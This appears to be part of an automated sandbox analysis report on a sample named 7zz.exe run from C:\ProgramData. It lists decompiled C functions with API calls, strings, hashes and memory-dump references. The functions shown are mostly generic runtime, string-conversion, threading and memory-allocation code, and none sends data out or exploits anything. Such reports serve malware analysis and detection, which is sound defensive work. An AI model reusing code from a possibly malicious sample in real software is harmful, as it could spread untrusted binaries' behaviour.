0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00414c0f
0x00414c3f
0x00000000
0x00414c11
0x00414c11
0x00414c14
0x00414c1d
0x00414c1d
0x00414bbd
0x00414c1f
0x00414c22
0x00414c29
0x00414c36
0x00414c3e

APIs

__EH_prolog.LIBCMT ref: 00414B70

Strings

[<A, xrefs: 00414B80, 00414C22
, xrefs: 00414C0B

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: $[<A
API String ID: 3519838083-980560344
Opcode ID: fc09c8835bf1d1419033baf57481bdbf59988f115ef5698bf44c214e65704d7e
Instruction ID: a66645b3afa9c2ee447036ac3f63c81d7f7369c510e48348743a797e60edc476
Opcode Fuzzy Hash: fc09c8835bf1d1419033baf57481bdbf59988f115ef5698bf44c214e65704d7e
Instruction Fuzzy Hash: BD218E70A012198BCF04EFA5C5806EEB776FFD8308F64441FC502B7241EB789A85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00416E2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416E2C(intOrPtr __ecx) {
				void* _t24;
				void* _t27;
				intOrPtr* _t30;
				signed int _t49;
				intOrPtr* _t52;
				void* _t54;

				E0046B890(E00474B74, _t54);
				 *((intOrPtr*)(_t54 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t54 - 0x10)) = 0x48bf2c;
				do {
					_t49 = 0;
					_t52 =  *((intOrPtr*)( *((intOrPtr*)(_t54 - 0x10))));
					if( *_t52 != 0) {
						_t30 = _t52;
						do {
							_t49 = _t49 + 1;
							_t30 = _t30 + 2;
						} while ( *_t30 != 0);
					}
					_t37 =  *((intOrPtr*)(_t54 - 0x14));
					if( *((intOrPtr*)( *((intOrPtr*)(_t54 - 0x14)) + 4)) < _t49) {
						goto L7;
					} else {
						E00407399(_t37, _t54 - 0x20, _t49);
						 *(_t54 - 4) = 0;
						_t27 = E0040807A(_t52);
						 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
						E00407A18( *((intOrPtr*)(_t54 - 0x20)));
						if((0 | _t27 != 0x00000000) != 0 || E00416EDE( *((intOrPtr*)(_t54 - 0x14)), _t49) != 0) {
							goto L7;
						} else {
							L9:
							_t24 = 0;
						}
					}
					L11:
					 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
					return _t24;
					L7:
					 *((intOrPtr*)(_t54 - 0x10)) =  *((intOrPtr*)(_t54 - 0x10)) + 4;
				} while ( *((intOrPtr*)(_t54 - 0x10)) < 0x48bf3c);
				if(E00416F4A( *((intOrPtr*)(_t54 - 0x14)), 0x48bf68) != 0) {
					_t24 = E00416F4A( *((intOrPtr*)(_t54 - 0x14)), 0x48bf60);
				} else {
					goto L9;
				}
				goto L11;
			}

0x00416e31
0x00416e3c
0x00416e3f
0x00416e46
0x00416e4b
0x00416e4d
0x00416e52
0x00416e54
0x00416e56
0x00416e56
0x00416e58
0x00416e59
0x00416e56
0x00416e5e
0x00416e64
0x00000000
0x00416e66
0x00416e6b
0x00416e74
0x00416e77
0x00416e84
0x00416e88
0x00416e90
0x00000000
0x00416ebe
0x00416ebe
0x00416ebe
0x00416ebe
0x00416e90
0x00416ecf
0x00416ed5
0x00416edd
0x00416ea0
0x00416ea0
0x00416ea4
0x00416ebc
0x00416eca
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00416E31

Strings

LPT, xrefs: 00416EC5
COM, xrefs: 00416EB0

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID: COM$LPT
API String ID: 3519838083-915345583
Opcode ID: d26558381b6772eea968b0d54f164c3262fecb6ff468361b5f304004559fcc44
Instruction ID: 7fc7bf41c9544355426c18039b4ebced735f38342408f175ac6efea5b4200ce5
Opcode Fuzzy Hash: d26558381b6772eea968b0d54f164c3262fecb6ff468361b5f304004559fcc44
Instruction Fuzzy Hash: FD118135E00215CBCF10EFA5C9415EEB376EF85318B11866FD511A7291C7389D86CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00470889 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00470889() {
				signed int _v8;
				char _v12;
				CHAR* _t14;
				intOrPtr _t27;
				CHAR* _t37;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(_t33);
				_t46 =  *0x49658c; // 0x1
				if(_t46 == 0) {
					E00471C08();
				}
				GetModuleFileNameA(0, 0x49373c, 0x104);
				_t14 =  *0x49659c; // 0x683868
				 *0x49371c = 0x49373c;
				_t37 = 0x49373c;
				if( *_t14 != 0) {
					_t37 = _t14;
				}
				E00470922(_t37, 0, 0,  &_v8,  &_v12);
				_t41 = L0046BFC5(_v12 + _v8 * 4);
				if(_t41 == 0) {
					E0046D03C(8);
				}
				E00470922(_t37, _t41, _t41 + _v8 * 4,  &_v8,  &_v12);
				_t27 = _v8 - 1;
				 *0x493704 = _t41;
				 *0x493700 = _t27;
				return _t27;
			}

0x0047088d
0x00470891
0x00470899
0x0047089b
0x0047089b
0x004708ac
0x004708b2
0x004708b7
0x004708bd
0x004708c1
0x004708c3
0x004708c3
0x004708d0
0x004708e4
0x004708eb
0x004708ef
0x004708f4
0x00470906
0x00470911
0x00470912
0x0047091a
0x00470921

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\7zz.exe,00000104,?,?,?,?,?,?,0046CFEB), ref: 004708AC

Strings

C:\ProgramData\7zz.exe, xrefs: 004708A0, 004708AA, 004708CF, 00470905
h8h, xrefs: 004708B2

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: FileModuleName
String ID: C:\ProgramData\7zz.exe$h8h
API String ID: 514040917-1239049134
Opcode ID: 374ca1ee558913e055006786c4f8ac9f9bc5f2affd582e0ef7d88b07fb241204
Instruction ID: 074cebae59902112b58a1229290a15cee7db23e677cd0c16cc7fd055ee0c8137
Opcode Fuzzy Hash: 374ca1ee558913e055006786c4f8ac9f9bc5f2affd582e0ef7d88b07fb241204
Instruction Fuzzy Hash: 0F113DF6900118BFD711EFD5DC81CEB7BACEB05268B0140BBF549D7202E634AE448BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004080C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004080C7(intOrPtr __ecx, char** __edx, void* __eflags) {
				signed int _t33;
				intOrPtr _t48;
				char** _t52;
				void* _t55;

				E0046B890(E00473804, _t55);
				 *((intOrPtr*)(_t55 - 0x10)) = __ecx;
				_t52 = __edx;
				 *((intOrPtr*)(_t55 - 0x14)) = 0;
				 *(_t55 - 0x20) = 0;
				 *(_t55 - 0x1c) = 0;
				 *((intOrPtr*)(_t55 - 0x18)) = 0;
				E00401E9A(_t55 - 0x20, 3);
				_t48 =  *((intOrPtr*)(__edx + 4));
				 *((intOrPtr*)(_t55 - 4)) = 0;
				if(_t48 != 0) {
					if(_t48 >=  *((intOrPtr*)(_t55 - 0x18))) {
						E00401E9A(_t55 - 0x20, _t48);
					}
					_t33 = MultiByteToWideChar( *(_t55 + 8), 0,  *_t52, _t52[1],  *(_t55 - 0x20), _t48 + 1);
					if(_t33 == 0) {
						 *(_t55 + 8) = 0x44e74;
						_t33 = E0046B8F4(_t55 + 8, 0x47e128);
					}
					( *(_t55 - 0x20))[_t33] = 0;
					 *(_t55 - 0x1c) = _t33;
				}
				E004039C0( *((intOrPtr*)(_t55 - 0x10)), _t55 - 0x20);
				E00407A18( *(_t55 - 0x20));
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return  *((intOrPtr*)(_t55 - 0x10));
			}

0x004080cc
0x004080d6
0x004080dc
0x004080e3
0x004080e6
0x004080e9
0x004080ec
0x004080ef
0x004080f4
0x004080f7
0x004080fc
0x00408101
0x00408107
0x00408107
0x0040811c
0x00408124
0x0040812f
0x00408136
0x00408136
0x0040813e
0x00408142
0x00408142
0x0040814c
0x00408154
0x00408163
0x0040816b

APIs

__EH_prolog.LIBCMT ref: 004080CC
MultiByteToWideChar.KERNEL32(?,00000000,?,00000002,?,?,00000003,59@,?,00000000,?,?,?,?,00000000), ref: 0040811C

Strings

59@, xrefs: 004080D9

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ByteCharH_prologMultiWide
String ID: 59@
API String ID: 3731712410-2780377667
Opcode ID: c5154a1bd991084fb26572e5af563df919d859aa9556be1335024a578bc19ce4
Instruction ID: d702833a8b0d2e9c08c0512ca54372eb887272844dd4864684de151fd06ec4aa
Opcode Fuzzy Hash: c5154a1bd991084fb26572e5af563df919d859aa9556be1335024a578bc19ce4
Instruction Fuzzy Hash: 8D11F9B1900119AFCF10EF9AC9819EEBBB9FF88354B40443EE545B7251D7386A41CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0045B510 Relevance: 5.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045B510(intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v4;
				signed int _v8;
				void* __ebx;
				void* __ebp;
				void* _t45;
				signed int _t51;
				intOrPtr _t53;
				void* _t64;
				struct _CRITICAL_SECTION* _t65;
				intOrPtr _t90;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr _t101;
				struct _CRITICAL_SECTION* _t102;

				_t91 = __edx;
				_t97 = __ecx;
				while(1) {
					L1:
					_v8 = 0;
					E00467AC0( *((intOrPtr*)(_t97 + 0x13c)));
					_t45 = E00467B10(_t97 + 0x140);
					while( *((intOrPtr*)(_t97 + 0x130)) == 0) {
						if( *((intOrPtr*)(_t97 + 0x134)) != 0) {
							 *((intOrPtr*)(_t97 + 0x170)) = _v8;
							E00467B10(_t97 + 0x144);
							goto L1;
						}
						_t98 =  *((intOrPtr*)(_t97 + 0x178));
						if(E00459DE0(_t45, _t65, _t98, _t91) == 0) {
							E00467AC0( *((intOrPtr*)(_t97 + 0x148)));
							E00459E00(_t98, _t91);
							_t50 =  *((intOrPtr*)(_t98 + 4));
							if( *((intOrPtr*)(_t98 + 4)) > 0xffffdfff) {
								E00459D10(_t50 -  *((intOrPtr*)(_t98 + 0x5c)), _t98, _t50 -  *((intOrPtr*)(_t98 + 0x5c)) - 1);
								_t91 =  *((intOrPtr*)(_t98 + 0x20)) +  *(_t98 + 0x60) * 4;
								E0045A1C0(_t50 -  *((intOrPtr*)(_t98 + 0x5c)) - 1,  *((intOrPtr*)(_t98 + 0x20)) +  *(_t98 + 0x60) * 4,  *((intOrPtr*)(_t98 + 0x28)) + 1);
							}
							_t51 = _v8;
							_t101 =  *((intOrPtr*)(_t98 + 0xc)) -  *((intOrPtr*)(_t98 + 4));
							_t65 = ((_t51 & 0x00000007) << 0xf) +  *((intOrPtr*)(_t97 + 0xf8));
							_v8 = _t51 + 1;
							 *_t65 = 2;
							 *((intOrPtr*)(_t65 + 4)) = _t101;
							_t53 =  *((intOrPtr*)(_t98 + 0x48));
							if(_t101 >= _t53) {
								_t101 = _t101 + 1 - _t53;
								if(_t101 > 0x1ffe) {
									_t101 = 0x1ffe;
								}
								_t91 =  *((intOrPtr*)(_t98 + 4));
								 *((intOrPtr*)( *((intOrPtr*)(_t97 + 0x174))))( *((intOrPtr*)(_t98 + 0x20)) +  *(_t98 + 0x60) * 4,  *((intOrPtr*)(_t98 + 0x28)), _t65 + 8, _t101, _t98 + 0x70);
								 *_t65 =  *_t65 + _t101;
							}
							 *((intOrPtr*)(_t98 + 4)) =  *((intOrPtr*)(_t98 + 4)) + _t101;
							 *_t98 =  *_t98 + _t101;
							_t45 = E00467C30(_t97 + 0x14c);
						} else {
							_t65 = _t97 + 0x5c;
							EnterCriticalSection(_t65);
							_t102 = _t97 + 0x158;
							EnterCriticalSection(_t102);
							_v4 = E00459CF0(_t98);
							E00459DB0(_t98);
							_t64 = E00459CF0(_t98);
							_t90 = _v4;
							_t91 = _t64 - _t90;
							 *_t97 =  *_t97 + _t64 - _t90;
							_t45 = _t64 - _t90;
							 *((intOrPtr*)(_t97 + 0x118)) =  *((intOrPtr*)(_t97 + 0x118)) + _t45;
							LeaveCriticalSection(_t65);
							LeaveCriticalSection(_t102);
						}
					}
					return _t45;
				}
			}

0x0045b510
0x0045b517
0x0045b520
0x0045b520
0x0045b526
0x0045b52e
0x0045b539
0x0045b540
0x0045b554
0x0045b67d
0x0045b689
0x00000000
0x0045b689
0x0045b55a
0x0045b569
0x0045b5c1
0x0045b5c8
0x0045b5cd
0x0045b5d5
0x0045b5e1
0x0045b5f0
0x0045b5f6
0x0045b5f6
0x0045b5fb
0x0045b602
0x0045b60d
0x0045b614
0x0045b618
0x0045b61e
0x0045b621
0x0045b626
0x0045b62f
0x0045b637
0x0045b639
0x0045b639
0x0045b654
0x0045b660
0x0045b662
0x0045b662
0x0045b664
0x0045b667
0x0045b66f
0x0045b56b
0x0045b56b
0x0045b56f
0x0045b575
0x0045b57c
0x0045b58b
0x0045b58f
0x0045b596
0x0045b59b
0x0045b5a7
0x0045b5a9
0x0045b5ab
0x0045b5ad
0x0045b5b4
0x0045b5b7
0x0045b5b7
0x0045b569
0x0045b69a
0x0045b69a

APIs

Part of subcall function 00467AC0: WaitForSingleObject.KERNEL32(?,000000FF,004146EB), ref: 00467AC3

Part of subcall function 00467B10: SetEvent.KERNEL32(00000000,00410FDF), ref: 00467B13

EnterCriticalSection.KERNEL32(?), ref: 0045B56F
EnterCriticalSection.KERNEL32(?), ref: 0045B57C
LeaveCriticalSection.KERNEL32(?), ref: 0045B5B4
LeaveCriticalSection.KERNEL32(?), ref: 0045B5B7

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CriticalSection$EnterLeave$EventObjectSingleWait
String ID:
API String ID: 497781136-0
Opcode ID: 363cd7293d6a614269b236afac2ebfd5d812988adaed9e844cedbbb4af3ceb87
Instruction ID: 2a5c4f7d81dbeabed9c7bdf7af0fc55ee193e6dc8c14afa35629c78e07f6f74b
Opcode Fuzzy Hash: 363cd7293d6a614269b236afac2ebfd5d812988adaed9e844cedbbb4af3ceb87
Instruction Fuzzy Hash: B0417E71200705DBC718EF65C890AAAB3E5FF84315F004A2EE86A47652EB38B959CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00463450 Relevance: 5.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00463450() {
				void* __esi;
				intOrPtr _t21;
				signed int _t22;
				intOrPtr _t24;
				struct _CRITICAL_SECTION* _t25;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t44;
				struct _CRITICAL_SECTION* _t45;
				void* _t47;

				_t41 =  *((intOrPtr*)(_t47 + 0xc));
				while(1) {
					_t31 =  *_t41;
					_t21 =  *((intOrPtr*)(_t41 + 0x14));
					if(_t21 !=  *((intOrPtr*)(_t31 + 8)) - 1) {
						_t22 = _t21 + 1;
					} else {
						_t22 = 0;
					}
					_t30 = _t31 + 0x270 + ((_t22 << 4) + _t22) * 4;
					_t24 = E00463300(_t41, _t47 + 0x10);
					_t40 = _t24;
					if(_t40 != 0) {
						break;
					}
					if( *((intOrPtr*)(_t47 + 0x10)) == _t24) {
						continue;
					} else {
						return _t24;
					}
					L12:
				}
				_t44 =  *_t41;
				_t25 = _t44 + 0x20;
				 *(_t47 + 0x18) = _t25;
				EnterCriticalSection(_t25);
				if( *((intOrPtr*)(_t44 + 0x38)) == 0) {
					 *((intOrPtr*)(_t44 + 0x38)) = _t40;
				}
				LeaveCriticalSection( *(_t47 + 0x14));
				_t42 =  *_t41;
				_t45 = _t42 + 0x58;
				EnterCriticalSection(_t45);
				if( *((intOrPtr*)(_t42 + 0x54)) == 0) {
					 *((intOrPtr*)(_t42 + 0x54)) = _t40;
				}
				LeaveCriticalSection(_t45);
				 *((intOrPtr*)(_t30 + 0x34)) = 1;
				 *((intOrPtr*)(_t30 + 0x38)) = 1;
				E00467B10(_t30 + 0x3c);
				E00467B10(_t30 + 0x40);
				return _t40;
				goto L12;
			}

0x00463452
0x00463457
0x00463457
0x0046345c
0x00463462
0x00463468
0x00463464
0x00463464
0x00463464
0x00463475
0x0046347c
0x00463481
0x00463485
0x00000000
0x00000000
0x0046348b
0x00000000
0x00463490
0x00463490
0x00463490
0x00000000
0x0046348b
0x00463494
0x00463496
0x0046349a
0x0046349e
0x004634a8
0x004634aa
0x004634aa
0x004634b2
0x004634b8
0x004634ba
0x004634be
0x004634c8
0x004634ca
0x004634ca
0x004634ce
0x004634dc
0x004634df
0x004634e2
0x004634ea
0x004634f5
0x00000000

APIs

EnterCriticalSection.KERNEL32(?), ref: 0046349E
LeaveCriticalSection.KERNEL32(?), ref: 004634B2
EnterCriticalSection.KERNEL32(?), ref: 004634BE
LeaveCriticalSection.KERNEL32(?), ref: 004634CE

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 763120c723ab6a929ecc1660bfd391695ed6dbb3d951ff785a740585ff992950
Instruction ID: 1e89e5a88ddaebfbdb378bbbed7090dd9077bd7fa7876fd2703511a7e9ddeb49
Opcode Fuzzy Hash: 763120c723ab6a929ecc1660bfd391695ed6dbb3d951ff785a740585ff992950
Instruction Fuzzy Hash: DE116D716002449FC750DF24D884A5AB7E8FFD435AF10483FE956C3240EB74E994CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0046F168 Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046F168() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x496574; // 0x0
				_t26 =  *0x496564; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x496578; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x496580, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x496574 =  *0x496574 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x496580, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = HeapReAlloc( *0x496580, 0,  *0x496578, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x496564 =  *0x496564 + 0x10;
				 *0x496578 = _t25;
				_t15 =  *0x496574; // 0x0
				goto L3;
			}

0x0046f168
0x0046f16d
0x0046f179
0x0046f1ab
0x0046f1ab
0x0046f1c1
0x0046f1c4
0x0046f1cc
0x0046f1cf
0x0046f1fb
0x00000000
0x0046f1fb
0x0046f1de
0x0046f1e6
0x0046f1e9
0x0046f1ff
0x0046f203
0x0046f205
0x0046f208
0x0046f211
0x00000000
0x0046f214
0x0046f1f5
0x00000000
0x0046f1f5
0x0046f17b
0x0046f190
0x0046f198
0x00000000
0x00000000
0x0046f19a
0x0046f1a1
0x0046f1a6
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,0046EF30,00000000,00000000,00000000,0046C051,00000000,00000000,?,00000000,00000000,00000000), ref: 0046F190
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,0046EF30,00000000,00000000,00000000,0046C051,00000000,00000000,?,00000000,00000000,00000000), ref: 0046F1C4
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0046F1DE
HeapFree.KERNEL32(00000000,?), ref: 0046F1F5

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: cb8af63cc659436922efd35e7e30b185ae4ad1793d55aff047b0aee091a2b577
Instruction ID: 7b68cd01d263c33f28d48fb30cc88c12b2ab1b0083907142a34400c88376abf0
Opcode Fuzzy Hash: cb8af63cc659436922efd35e7e30b185ae4ad1793d55aff047b0aee091a2b577
Instruction Fuzzy Hash: 3B118F30600201EFE721CF28FC459567BB1FB953A07524A3AF1A5C21B4D7719C56CB0D

Uniqueness

Uniqueness Score: -1.00%

Function 0046E541 Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0046E541(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x48e0ac);
				InitializeCriticalSection( *0x48e09c);
				InitializeCriticalSection( *0x48e08c);
				InitializeCriticalSection( *0x48e06c);
				return _t1;
			}

0x0046e541
0x0046e54e
0x0046e556
0x0046e55e
0x0046e566
0x0046e569

APIs

InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E54E
InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E556
InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E55E
InitializeCriticalSection.KERNEL32(?,0046E322,?,0046CFBC), ref: 0046E566

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: dc021efed5507b4fb83a724604d938c0a9f009831836a325e097d52029dd6aec
Instruction ID: 41dab6ff28bf4c48c80b7d4fe62f18fd1ff32017a734059296a2bd387a42c2bf
Opcode Fuzzy Hash: dc021efed5507b4fb83a724604d938c0a9f009831836a325e097d52029dd6aec
